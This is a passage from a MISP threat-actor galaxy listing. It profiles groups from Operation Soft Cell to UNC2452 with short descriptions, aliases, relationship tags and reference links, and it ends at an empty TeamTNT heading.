https://www.proofpoint.com/us/blog/threat-insight/ta410-group-behind-lookback-attacks-against-us-utilities-sector-returns-new

Operation Soft Cell

In 2018, the Cybereason Nocturnus team identified an advanced, persistent attack targeting global telecommunications providers carried out by a threat actor using tools and techniques commonly associated with Chinese-affiliated threat actors, such as APT10. This multi-wave attacks focused on obtaining data of specific, high-value targets and resulted in a complete takeover of the network.

The tag is: misp-galaxy:threat-actor="Operation Soft Cell"

Operation Soft Cell has relationships with:

  • similar: misp-galaxy:threat-actor="GALLIUM" with estimative-language:likelihood-probability="almost-certain"

  • similar: misp-galaxy:microsoft-activity-group="GALLIUM" with estimative-language:likelihood-probability="likely"

Table 12017. Table References

Links

https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers

Operation WizardOpium

We are calling these attacks Operation WizardOpium. So far, we have been unable to establish a definitive link with any known threat actors. There are certain very weak code similarities with Lazarus attacks, although these could very well be a false flag. The profile of the targeted website is more in line with earlier DarkHotel attacks that have recently deployed similar false flag attacks.

The tag is: misp-galaxy:threat-actor="Operation WizardOpium"

Table 12018. Table References

Links

https://securelist.com/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium/94866/

Calypso

For the first time, the activity of the Calypso group was detected by specialists of PT Expert Security Center in March 2019, during the work to detect cyber threats. As a result, many malware samples of this group were obtained, affected organizations and control servers of intruders were identified. According to our data, the group has been active since at least September 2016. The main goal of the group is to steal confidential data, the main victims are government agencies from Brazil, India, Kazakhstan, Russia, Thailand, Turkey. Our data suggest that the group has Asian roots. Description translated from Russian.

The tag is: misp-galaxy:threat-actor="Calypso"

Calypso is also known as:

  • BRONZE MEDLEY

Table 12019. Table References

Links

https://www.ptsecurity.com/upload/corporate/ru-ru/analytics/calypso-apt-2019-rus.pdf

https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/

TA2101

Proofpoint researchers detected campaigns from a relatively new actor, tracked internally as TA2101, targeting German companies and organizations to deliver and install backdoor malware. The actor initiated their campaigns impersonating the Bundeszentralamt fur Steuern, the German Federal Ministry of Finance, with lookalike domains, verbiage, and stolen branding in the emails. For their campaigns in Germany, the actor chose Cobalt Strike, a commercially licensed software tool that is generally used for penetration testing and emulates the type of backdoor framework used by Metasploit, a similar penetration testing tool. Proofpoint researchers have also observed this actor distributing Maze ransomware, employing similar social engineering techniques to those it uses for Cobalt Strike, while also targeting organizations in Italy and impersonating the Agenzia Delle Entrate, the Italian Revenue Agency. We have also recently observed the actor targeting organizations in the United States using the IcedID banking Trojan while impersonating the United States Postal Service (USPS).

The tag is: misp-galaxy:threat-actor="TA2101"

TA2101 is also known as:

  • Maze Team

  • TWISTED SPIDER

  • GOLD VILLAGE

  • Storm-0216

  • DEV-0216

  • Twisted Spider

Table 12020. Table References

Links

https://www.proofpoint.com/us/threat-insight/post/ta2101-plays-government-imposter-distribute-malware-german-italian-and-us

https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/

https://adversary.crowdstrike.com/adversary/twisted-spider/

https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf

https://www.secureworks.com/blog/how-cyber-adversaries-are-adapting-to-exploit-the-global-pandemic

http://www.secureworks.com/research/threat-profiles/gold-village

https://www.cysecurity.news/2023/12/twisted-spiders-dangerous-cactus.html

APT-C-34

As reported by ZDNet, Chinese cyber-security vendor Qihoo 360 published a report on 2019-11-29 exposing an extensive hacking operation targeting the country of Kazakhstan. Targets included individuals and organizations involving all walks of life, such as government agencies, military personnel, foreign diplomats, researchers, journalists, private companies, the educational sector, religious figures, government dissidents, and foreign diplomats alike. The campaign, Qihoo 360 said, was broad, and appears to have been carried by a threat actor with considerable resources, and one who had the ability to develop their private hacking tools, buy expensive spyware off the surveillance market, and even invest in radio communications interception hardware.

The tag is: misp-galaxy:threat-actor="APT-C-34"

APT-C-34 is also known as:

  • Golden Falcon

Table 12021. Table References

Links

http://blogs.360.cn/post/APT-C-34_Golden_Falcon.html

https://www.zdnet.com/article/extensive-hacking-operation-discovered-in-kazakhstan/

luoxk

Luoxk is a malware campaign targeting web servers throughout Asia, Europe and North America.

The tag is: misp-galaxy:threat-actor="luoxk"

Table 12022. Table References

Links

https://www.systemtek.co.uk/2018/07/luoxk-malware-exploiting-cve-2018-2893/

RAZOR TIGER

An actor mainly targeting Pakistan military targets, active since at least 2012. We have low confidence that this malware might be authored by an Indian company. To spread the malware, they use unique implementations to leverage the exploits of known vulnerabilities (such as CVE-2017-11882) and later deploy a Powershell payload in the final stages.

The tag is: misp-galaxy:threat-actor="RAZOR TIGER"

RAZOR TIGER is also known as:

  • SideWinder

  • Rattlesnake

  • APT-C-17

  • T-APT-04

RAZOR TIGER has relationships with:

  • similar: misp-galaxy:malpedia="SideWinder (Windows)" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:360net-threat-actor="响尾蛇 - APT-C-24" with estimative-language:likelihood-probability="likely"

Table 12023. Table References

Links

https://securelist.com/apt-trends-report-q1-2018/85280/

https://blog.trendmicro.com/trendlabs-security-intelligence/first-active-attack-exploiting-cve-2019-2215-found-on-google-play-linked-to-sidewinder-apt-group/

https://otx.alienvault.com/pulse/5fd10760f9afb730d37c4742/

https://www.trendmicro.com/en_us/research/20/l/sidewinder-leverages-south-asian-territorial-issues-for-spear-ph.html

https://s.tencent.com/research/report/659.html

https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/fireeye-sidewinder-targeted-attack.pdf

https://s.tencent.com/research/report/479.html

https://medium.com/@Sebdraven/apt-sidewinder-tricks-powershell-anti-forensics-and-execution-side-loading-5bc1a7e7c84c

https://mp.weixin.qq.com/s/8j_rHA7gdMxY1_X8alj8Zg

Operation Wocao

Operation Wocao (我操, “Wǒ cāo”, used as “shit” or “damn”) is the name that Fox-IT uses to describe the hacking activities of a Chinese based hacking group. This report details the profile of a publicly underreported threat actor that Fox-IT has dealt with over the past two years. Fox-IT assesses with high confidence that the actor is a Chinese group and that they are likely working to support the interests of the Chinese government and are tasked with obtaining information for espionage purposes. With medium confidence, Fox-IT assesses that the tools, techniques and procedures are those of the actor referred to as APT20 by industry partners. We have identified victims of this actor in more than 10 countries, in government entities, managed service providers and across a wide variety of industries, including Energy, Health Care and High-Tech.

The tag is: misp-galaxy:threat-actor="Operation Wocao"

Table 12024. Table References

Links

https://www.fox-it.com/nl/actueel/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/

Budminer

Based on the evidence we have presented Symantec attributed the activity involving theDripion malware to the Budminer advanced threat group. While we have not seen newcampaigns using Taidoor malware since 2014, we believe the Budminer group has changedtactics to avoid detection after being outed publicly in security white papers and blogs over thepast few years.

The tag is: misp-galaxy:threat-actor="Budminer"

Budminer is also known as:

  • Budminer cyberespionage group

Table 12025. Table References

Links

https://www.symantec.com/connect/blogs/taiwan-targeted-new-cyberespionage-back-door-trojan

https://app.box.com/s/xqh458fe1url7mgl072hhd0yxqw3x0jm

https://www.research-collection.ethz.ch/bitstream/handle/20.500.11850/389371/1/Cyber-Reports-2020-01-A-one-sided-Affair.pdf

Attor

Adversary group targeting diplomatic missions and governmental organisations.

The tag is: misp-galaxy:threat-actor="Attor"

Table 12026. Table References

Links

https://www.welivesecurity.com/2019/10/10/eset-discovers-attor-spy-platform

APT-C-12

According to 360 TIC the actor has carried out continuous cyber espionage activities since 2011 on key units and departments of the Chinese government, military industry, scientific research, and finance. The organization focuses on information related to the nuclear industry and scientific research. The targets were mainly concentrated in mainland China…​[M]ore than 670 malware samples have been collected from the group, including more than 60 malicious plugins specifically for lateral movement; more than 40 C2 domain names and IPs related to the organization have also been discovered.

The tag is: misp-galaxy:threat-actor="APT-C-12"

APT-C-12 is also known as:

  • Sapphire Mushroom

  • Blue Mushroom

  • NuclearCrisis

Table 12027. Table References

Links

https://mp.weixin.qq.com/s/S-hiGFNC6WXGrkjytAVbpA

https://bitofhex.com/2020/02/10/sapphire-mushroom-lnk-files/

InvisiMole

Adversary group targeting diplomatic missions, governmental and military organisations, mainly in Ukraine.

The tag is: misp-galaxy:threat-actor="InvisiMole"

Table 12028. Table References

Links

https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/

https://www.welivesecurity.com/2020/06/18/digging-up-invisimole-hidden-arsenal/

ANTHROPOID SPIDER

Publicly known as 'EmpireMonkey', ANTHROPOID SPIDER conducted phishing campaigns in February and March 2019, spoofing French, Norwegian and Belizean financial regulators and institutions. These campaigns used macro-enabled Microsoft documents to deliver the PowerShell Empire post-exploitation framework. ANTHROPOID SPIDER likely enabled a breach that allegedly involved fraudulent transfers over the SWIFT network.

The tag is: misp-galaxy:threat-actor="ANTHROPOID SPIDER"

ANTHROPOID SPIDER is also known as:

  • Empire Monkey

  • CobaltGoblin

Table 12029. Table References

Links

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://www.kaspersky.com/about/press-releases/2019_fin7-hacking-group-targets-more-than-130-companies-after-leaders-arrest

https://fortiguard.com/encyclopedia/botnet/7630456

CLOCKWORK SPIDER

Opportunistic actor that installs custom root certificate on victim to support man-in-the-middle network monitoring.

The tag is: misp-galaxy:threat-actor="CLOCKWORK SPIDER"

Table 12030. Table References

Links

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://na.eventscloud.com/file_uploads/6568237bca6dc156e5c5557c5989e97c_CrowdStrikeFal.Con2019_ThroughEyesOfAdversary_J.Ayers.pdf

DOPPEL SPIDER

In June 2019, CrowdStrike Intelligence observed a source code fork of BitPaymer and began tracking the new ransomware strain as DoppelPaymer. Further technical analysis revealed an increasing divergence between two versions of Dridex, with the new version dubbed DoppelDridex. Based on this evidence, CrowdStrike Intelligence assessed with high confidence that a new group split off from INDRIK SPIDER to form the adversary DOPPEL SPIDER. Following DOPPEL SPIDER’s inception, CrowdStrike Intelligence observed multiple BGH incidents attributed to the group, with the largest known ransomware demand being 250 BTC. Other demands were not nearly as high, suggesting that the group conducts network reconnaissance to determine the value of the victim organization.

The tag is: misp-galaxy:threat-actor="DOPPEL SPIDER"

DOPPEL SPIDER is also known as:

  • GOLD HERON

Table 12031. Table References

Links

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

http://www.secureworks.com/research/threat-profiles/gold-heron

MONTY SPIDER

Spambots continued to decline in 2019, with MONTY SPIDER’s CraP2P spambot falling silent in April.

The tag is: misp-galaxy:threat-actor="MONTY SPIDER"

Table 12032. Table References

Links

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

NOCTURNAL SPIDER

Mentioned as MaaS operator in CrowdStrike’s 2020 Report.

The tag is: misp-galaxy:threat-actor="NOCTURNAL SPIDER"

Table 12034. Table References

Links

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

SCULLY SPIDER

Mentioned as operator of DanaBot in CrowdStrike’s 2020 Report.

The tag is: misp-galaxy:threat-actor="SCULLY SPIDER"

Table 12035. Table References

Links

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

SMOKY SPIDER

Mentioned as operator of SmokeLoader in CrowdStrike’s 2020 Report.

The tag is: misp-galaxy:threat-actor="SMOKY SPIDER"

Table 12036. Table References

Links

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

VENOM SPIDER

VENOM SPIDER is the developer of a large toolset that includes SKID, VenomKit and Taurus Loader. Under the moniker 'badbullzvenom', the adversary has been an active member of Russian underground forums since at least 2012, specializing in the identification of vulnerabilities and the subsequent development of tools for exploitation, as well as for gaining and maintaining access to victim machines and carding services. Recent advertisements for the malware indicate that VENOM SPIDER limits the sale and use of its tools, selling modules only to trusted affiliates. This preference can be seen in the fact that adversaries observed using the tools include the targeted criminal adversary COBALT SPIDER and BGH adversaries WIZARD SPIDER and PINCHY SPIDER.

The tag is: misp-galaxy:threat-actor="VENOM SPIDER"

VENOM SPIDER is also known as:

  • badbullzvenom

  • badbullz

Table 12037. Table References

Links

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://www.esentire.com/web-native-pages/the-hunt-for-venom-spider-part-2

Operation Shadow Force

Operation Shadow Force is a group of malware that is representative of Shadow Force and Wgdrop from 2013 to 2020, and is a group activity that attacks Korean companies and organizations. The group’s first confirmed attack was in March 2013, but considering the date of malware creation, it is likely to have been active before 2012. Since the malware used mainly by them is Shadow Force, it was named Operation Shadow Force, and it has not been confirmed whether the attacker is associated with a known group.

The tag is: misp-galaxy:threat-actor="Operation Shadow Force"

Table 12038. Table References

Links

https://www.ahnlab.com/kr/site/securityinfo/secunews/secuNewsView.do?curPage=1&menu_dist=2&seq=29129

https://mobile.twitter.com/mstoned7/status/1247361687570673664

NOTROBIN

Researchers at FireEye report finding a hacking group (dubbed NOTROBIN) that has been bundling mitigation code for NetScaler servers with its exploits. In effect, the hackers exploit the flaw to get access to the server, kill any existing malware, set up their own backdoor, then block off the vulnerable code from future exploit attempts by mitigation.

The tag is: misp-galaxy:threat-actor="NOTROBIN"

Table 12039. Table References

Links

https://www.theregister.co.uk/2020/01/17/hackers_patch_citrix_vulnerability/

https://www.fireeye.com/blog/threat-research/2020/01/vigilante-deploying-mitigation-for-citrix-netscaler-vulnerability-while-maintaining-backdoor.html

ItaDuke

ItaDuke is an actor known since 2013. It used PDF exploits for dropping malware and Twitter accounts to store C2 server urls. On 2018, an actor named DarkUniverse, which was active between 2009 to 2017, was attributed to this ItaDuke by Kaspersky.

The tag is: misp-galaxy:threat-actor="ItaDuke"

ItaDuke is also known as:

  • DarkUniverse

  • SIG27

Table 12040. Table References

Links

https://securelist.com/darkuniverse-the-mysterious-apt-framework-27/94897/

https://www.fireeye.com/blog/threat-research/2013/02/the-number-of-the-beast.html

https://securelist.com/new-uyghur-and-tibetan-themed-attacks-using-pdf-exploits/35465

Nazar

This actor was identified by Juan Andres Guerrero-Saade from the SIG37 cluster as published in the ShadowBrokers' 'Lost in Translation' leak. Earliest known sighting potentially dates back to as far as 2008 with a confirmed center of activity around 2010-2013. The actor name is derived from a PDB debug string fragment: 'khzer'. Victimology indicates targeting of Iran, assessed with low confidence based on VT file submission locations. Nazar employs a modular toolkit where a main dropper silently registers multiple DLLs as OLE controls in the Windows registry. Functionality includes keylogging, sound and screen grabbing, as well as traffic capture using the MicroOlap Packet Sniffer library.

The tag is: misp-galaxy:threat-actor="Nazar"

Nazar is also known as:

  • SIG37

Table 12041. Table References

Links

https://www.epicturla.com/blog/the-lost-nazar

Higaisa

The organization often uses important North Korean time nodes such as holidays and North Korea to conduct fishing activities. The bait includes New Year blessings, Lantern blessings, North Korean celebrations, and important news, overseas personnel contact lists and so on. In addition, the attack organization also has the attack capability of the mobile terminal. The targets of the attack also include diplomatic entities related to North Korea (such as embassy officials in various places), government officials, human rights organizations, North Korean residents abroad, and traders. The victim countries currently monitored include China, North Korea, Japan, Nepal, Singapore, Russia, Poland, Switzerland, etc.

The tag is: misp-galaxy:threat-actor="Higaisa"

Table 12042. Table References

Links

https://s.tencent.com/research/report/836.html

https://blog.malwarebytes.com/threat-analysis/2020/06/higaisa/

COBALT JUNO

COBALT JUNO has operated since at least 2013 and focused on targets located in the Middle East including Iran, Jordan, Egypt & Lebanon. COBALT JUNO custom spyware families SABER1 and SABER2, include surveillance functionality and masquerade as legitimate software utilities such as Adobe Updater, StickyNote and ASKDownloader. CTU researchers assess with moderate confidence that COBALT JUNO operated the ZooPark Android spyware since at least mid-2015. ZooPark was publicly exposed in 2018 in both vendor reporting and a high profile leak of C2 server data. COBALT JUNO is linked to a private security company in Iran and outsources aspects of tool development work to commercial software developers. CTU researchers have observed the group using strategic web compromises to deliver malware. CTU researchers’ discovery of new C2 domains in 2019 suggest the group is still actively performing operations.

The tag is: misp-galaxy:threat-actor="COBALT JUNO"

COBALT JUNO is also known as:

  • APT-C-38 (QiAnXin)

  • SABER LION

  • TG-2884 (SCWX CTU)

Table 12043. Table References

Links

https://www.secureworks.com/research/threat-profiles/cobalt-juno

COBALT KATANA

COBALT KATANA has been active since at least March 2018, and it focuses many of its operations on organizations based in or associated with Kuwait. The group has targeted government, logistics, and shipping organizations. The threat actors gain initial access to targets using DNS hijacking, strategic web compromise with SMB forced authentication, and password brute force attacks. COBALT KATANA operates a custom platform referred to as the Sakabota Framework, also referred to as Sakabota Core, with a complimentary set of modular backdoors and accessory tools including Gon, Hisoka, Hisoka Netero, Killua, Diezen, and Eye. The group has implemented DNS tunnelling in its malware and malicious scripts and also operates the HyphenShell web shell to strengthen post-intrusion access. CTU researchers assess with moderate confidence that COBALT KATANA operates on behalf of Iran, and elements of its operations such as overlapping infrastructure, use of DNS hijacking, implementation of DNS-based C2 channels in malware and web shell security mechanisms suggest connections to COBALT GYPSY and COBALT EDGEWATER.

The tag is: misp-galaxy:threat-actor="COBALT KATANA"

COBALT KATANA is also known as:

  • Hive0081 (IBM)

  • SectorD01 (NHSC)

  • xHunt campaign (Palo Alto)

  • Hunter Serpens

Table 12044. Table References

Links

https://www.secureworks.com/research/threat-profiles/cobalt-katana

https://unit42.paloaltonetworks.com/atoms/hunter-serpens/

Dark Basin

Dark Basin is a hack-for-hire group that has targeted thousands of individuals and hundreds of institutions on six continents. Targets include advocacy groups and journalists, elected and senior government officials, hedge funds, and multiple industries. Dark Basin extensively targeted American nonprofits, including organisations working on a campaign called #ExxonKnew, which asserted that ExxonMobil hid information about climate change for decades. We also identify Dark Basin as the group behind the phishing of organizations working on net neutrality advocacy, previously reported by the Electronic Frontier Foundation. We link Dark Basin with high confidence to an Indian company, BellTroX InfoTech Services, and related entitie

The tag is: misp-galaxy:threat-actor="Dark Basin"

Table 12045. Table References

Links

https://citizenlab.ca/2020/06/dark-basin-uncovering-a-massive-hack-for-hire-operation/

https://github.com/citizenlab/malware-indicators/tree/master/202006_DarkBasin

GALLIUM

GALLIUM, is a threat actor believed to be targeting telecommunication providers over the world, mostly South-East Asia, Europe and Africa. To compromise targeted networks, GALLIUM target unpatched internet-facing services using publicly available exploits and have been known to target vulnerabilities in WildFly/JBoss.

The tag is: misp-galaxy:threat-actor="GALLIUM"

GALLIUM is also known as:

  • Red Dev 4

  • Alloy Taurus

  • Granite Typhoon

GALLIUM has relationships with:

  • similar: misp-galaxy:threat-actor="Operation Soft Cell" with estimative-language:likelihood-probability="almost-certain"

  • similar: misp-galaxy:microsoft-activity-group="GALLIUM" with estimative-language:likelihood-probability="almost-certain"

  • similar: misp-galaxy:microsoft-activity-group="Granite Typhoon" with estimative-language:likelihood-probability="likely"

Table 12046. Table References

Links

https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/

https://www.youtube.com/watch?v=fBFm2fiEPTg

https://troopers.de/troopers22/talks/7cv8pz/

https://unit42.paloaltonetworks.com/atoms/alloytaurus/

https://unit42.paloaltonetworks.com/alloy-taurus-targets-se-asian-government/

Evilnum

ESET has analyzed the operations of Evilnum, the APT group behind the Evilnum malware previously seen in attacks against financial technology companies. While said malware has been seen in the wild since at least 2018 and documented previously, little has been published about the group behind it and how it operates. The group’s targets remain fintech companies, but its toolset and infrastructure have evolved and now consist of a mix of custom, homemade malware combined with tools purchased from Golden Chickens, a Malware-as-a-Service (MaaS) provider whose infamous customers include FIN6 and Cobalt Group.

The tag is: misp-galaxy:threat-actor="Evilnum"

Evilnum is also known as:

  • DeathStalker

  • TA4563

  • EvilNum

  • Jointworm

  • KNOCKOUT SPIDER

Table 12047. Table References

Links

https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/

https://securelist.com/deathstalker-mercenary-triumvirate/98177/

https://securelist.com/what-did-deathstalker-hide-between-two-ferns/99616/

https://www.proofpoint.com/us/blog/threat-insight/buy-sell-steal-evilnum-targets-cryptocurrency-forex-commodities

https://www.rewterz.com/rewterz-news/rewterz-threat-alert-evilnum-apt-group-active-iocs-7

https://www.rewterz.com/rewterz-news/rewterz-threat-alert-evilnum-apt-group-targeting-financial-sector

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://www.hivepro.com/wp-content/uploads/2022/08/Vulnerabilities-Threats-that-Matter-25th-to-31st-July.pdf

https://medium.com/bitso-engineering/profiling-disrupting-an-apt-spear-phishing-campaign-targeting-slack-users-in-the-financial-sector-9389533d5fc2

Fox Kitten

PIONEER KITTEN is an Iran-based adversary that has been active since at least 2017 and has a suspected nexus to the Iranian government. This adversary appears to be primarily focused on gaining and maintaining access to entities possessing sensitive information of likely intelligence interest to the Iranian government. According to DRAGOS, they also targeted ICS-related entities using known VPN vulnerabilities. They are widely known to use open source penetration testing tools for reconnaissance and to establish encrypted communications.

The tag is: misp-galaxy:threat-actor="Fox Kitten"

Fox Kitten is also known as:

  • PIONEER KITTEN

  • PARISITE

  • UNC757

  • Lemon Sandstorm

  • RUBIDIUM

Fox Kitten has relationships with:

  • similar: misp-galaxy:microsoft-activity-group="Lemon Sandstorm" with estimative-language:likelihood-probability="likely"

Table 12048. Table References

Links

https://youtu.be/pBDu8EGWRC4?t=2492

https://www.dragos.com/threat/parisite

https://www.dragos.com/wp-content/uploads/The-ICS-Threat-Landscape.pdf

https://www.dragos.com/wp-content/uploads/NA-EL-Threat-Perspective-2019.pdf

https://www.clearskysec.com/wp-content/uploads/2020/02/ClearSky-Fox-Kitten-Campaign.pdf

https://www.zdnet.com/article/fbi-says-an-iranian-hacking-group-is-attacking-f5-networking-devices

https://www.crowdstrike.com/blog/who-is-pioneer-kitten

https://www.zdnet.com/article/iranian-hackers-are-selling-access-to-compromised-companies-on-an-underground-forum

https://us-cert.cisa.gov/ncas/alerts/aa20-259a

XDSpy

Rare is the APT group that goes largely undetected for nine years, but XDSpy is just that; a previously undocumented espionage group that has been active since 2011. It has attracted very little public attention, with the exception of an advisory from the Belarusian CERT in February 2020. In the interim, the group has compromised many government agencies and private companies in Eastern Europe and the Balkans.

The tag is: misp-galaxy:threat-actor="XDSpy"

Table 12049. Table References

Links

https://www.welivesecurity.com/2020/10/02/xdspy-stealing-government-secrets-since-2011/

https://vblocalhost.com/uploads/VB2020-Faou-Labelle.pdf

https://github.com/eset/malware-ioc/tree/master/xdspy/

Evil Corp

Evil Corp is an internaltional cybercrime network. In December of 2019 the US Federal Government offered a $5M bounty for information leading to the arrest and conviction of Maksim V. Yakubets for allegedly orchestrating Evil Corp operations. Responsible for stealing over $100M from businesses and consumers. The Evil Corp organization is known for utilizing custom strains of malware such as JabberZeus, Bugat and Dridex to steal banking credentials.

The tag is: misp-galaxy:threat-actor="Evil Corp"

Evil Corp is also known as:

  • GOLD DRAKE

Table 12050. Table References

Links

https://krebsonsecurity.com/2019/12/inside-evil-corp-a-100m-cybercrime-menace/

https://en.wikipedia.org/wiki/Maksim_Yakubets

https://www.bbc.com/news/world-us-canada-53195749

http://www.secureworks.com/research/threat-profiles/gold-drake

https://www.secureworks.com/research/dridex-bugat-v5-botnet-takeover-operation

TRACER KITTEN

In April 2020, Crowstrike Falcon OverWatch discovered Iran-based adversary TRACER KITTEN conducting malicious interactive activity against multiple hosts at a telecommunications company in the Europe, Middle East and Africa (EMEA) region. The actor was found operating under valid user accounts, using custom backdoors in combination with SSH tunnels for C2. The adversary leveraged their foothold to conduct a variety of reconnaissance activities, undertake credential harvesting and prepare for data exfiltration.

The tag is: misp-galaxy:threat-actor="TRACER KITTEN"

Table 12051. Table References

Links

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020OverWatchNowheretoHide.pdf

FIN11

FIN11 is a well-established financial crime group that has recently focused its operations on ransomware and extortion. The group has been active since 2017 and has been tracked under UNC902 and later on as TEMP.Warlok. In some ways, FIN11 is reminiscent of APT1; they are notable not for their sophistication, but for their sheer volume of activity.(FireEye) Mandiant has also responded to numerous FIN11 intrusions, but we’ve only observed the group successfully monetize access in few instances. This could suggest that the actors cast a wide net during their phishing operations, then choose which victims to further exploit based on characteristics such as sector, geolocation or perceived security posture. Recently, FIN11 has deployed CLOP ransomware and threatened to publish exfiltrated data to pressure victims into paying ransom demands. The group’s shifting monetization methods—from point-of-sale (POS) malware in 2018, to ransomware in 2019, and hybrid extortion in 2020—is part of a larger trend in which criminal actors have increasingly focused on post-compromise ransomware deployment and data theft extortion. Notably, FIN11 includes a subset of the activity security researchers call TA505, Graceful Spider, Gold Evergreen, but we do not attribute TA505’s early operations to FIN11 and caution against using the names interchangeably. Attribution of both historic TA505 activity and more recent FIN11 activity is complicated by the actors’ use of criminal service providers. Like most financially motivated actors, FIN11 doesn’t operate in a vacuum. We believe that the group has used services that provide anonymous domain registration, bulletproof hosting, code signing certificates, and private or semi-private malware. Outsourcing work to these criminal service providers likely enables FIN11 to increase the scale and sophistication of their operations.

The tag is: misp-galaxy:threat-actor="FIN11"

FIN11 is also known as:

  • TEMP.Warlock

  • UNC902

FIN11 has relationships with:

  • similar: misp-galaxy:microsoft-activity-group="Lace Tempest" with estimative-language:likelihood-probability="likely"

Table 12052. Table References

Links

https://www.fireeye.com/blog/threat-research/2019/10/shikata-ga-nai-encoder-still-going-strong.html

https://www.fireeye.com/blog/threat-research/2020/10/fin11-email-campaigns-precursor-for-ransomware-data-theft.html

https://www.brighttalk.com/webcast/7451/447347

UNC1878

UNC1878 is a financially motivated threat actor that monetizes network access via the deployment of RYUK ransomware. Earlier this year, Mandiant published a blog on a fast-moving adversary deploying RYUK ransomware, UNC1878. Shortly after its release, there was a significant decrease in observed UNC1878 intrusions and RYUK activity overall almost completely vanishing over the summer. But beginning in early fall, Mandiant has seen a resurgence of RYUK along with TTP overlaps indicating that UNC1878 has returned from the grave and resumed their operations.

The tag is: misp-galaxy:threat-actor="UNC1878"

Table 12053. Table References

Links

https://twitter.com/anthomsec/status/1321865315513520128

https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html

https://gist.github.com/aaronst/6aa7f61246f53a8dd4befea86e832456

https://www.youtube.com/watch?v=CgDtm05qApE

https://www.fireeye.com/blog/threat-research/2020/03/the-cycle-of-adversary-pursuit.html

Red Charon

Throughout 2019, multiple companies in the Taiwan high-tech ecosystem were victims of an advanced persistent threat (APT) attack. Due to these APT attacks having similar behavior profiles (similar adversarial techniques, tactics, and procedures or TTP) with each other and previously documented cyberattacks, CyCraft assess with high confidence these new attacks were conducted by the same foreign threat actor. During their investigation, they dubbed this threat actor Chimera. “Chimera” stands for the synthesis of hacker tools that they’ve seen the group use, such as the skeleton key malware that contained code extracted from both Dumpert and Mimikatz — hence Chimera. Their operation — the entirety of the new attacks utilizing the Skeleton Key attack (described below) from late 2018 to late 2019, CyCraft have dubbed Operation Skeleton Key.

The tag is: misp-galaxy:threat-actor="Red Charon"

Table 12054. Table References

Links

https://i.blackhat.com/USA-20/Thursday/us-20-Chen-Operation-Chimera-APT-Operation-Targets-Semiconductor-Vendors.pdf

https://www.wired.com/story/chinese-hackers-taiwan-semiconductor-industry-skeleton-key/

https://cycraft.com/download/%5BTLP-White%5D20200415%20Chimera_V4.1.pdf

https://medium.com/cycraft/taiwan-high-tech-ecosystem-targeted-by-foreign-apt-group-5473d2ad8730

https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf

UNC2452

Reporting regarding activity related to the SolarWinds supply chain injection has grown quickly since initial disclosure on 13 December 2020. A significant amount of press reporting has focused on the identification of the actor(s) involved, victim organizations, possible campaign timeline, and potential impact. The US Government and cyber community have also provided detailed information on how the campaign was likely conducted and some of the malware used. MITRE’s ATT&CK team — with the assistance of contributors — has been mapping techniques used by the actor group, referred to as UNC2452/Dark Halo by FireEye and Volexity respectively, as well as SUNBURST and TEARDROP malware.

The tag is: misp-galaxy:threat-actor="UNC2452"

UNC2452 is also known as:

  • DarkHalo

  • StellarParticle

  • NOBELIUM

  • Solar Phoenix

  • Midnight Blizzard

UNC2452 has relationships with:

  • similar: misp-galaxy:microsoft-activity-group="NOBELIUM" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:tool="SNOWYAMBER" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:tool="HALFRIG" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:tool="QUARTERRIG" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:microsoft-activity-group="Midnight Blizzard" with estimative-language:likelihood-probability="likely"

Table 12055. Table References

Links

https://medium.com/mitre-attack/identifying-unc2452-related-techniques-9f7b6c7f3714

https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html

https://news.sophos.com/en-us/2020/12/21/how-sunburst-malware-does-defense-evasion/

https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/

https://pastebin.com/6EDgCKxd

https://github.com/fireeye/sunburst_countermeasures

https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware

https://www.fireeye.com/blog/threat-research/2021/03/sunshuttle-second-stage-backdoor-targeting-us-based-entity.html

https://unit42.paloaltonetworks.com/atoms/solarphoenix/

https://www.microsoft.com/en-us/security/blog/2024/01/25/midnight-blizzard-guidance-for-responders-on-nation-state-attack/

https://www.microsoft.com/en-us/security/blog/2023/08/02/midnight-blizzard-conducts-targeted-social-engineering-over-microsoft-teams/

TeamTNT

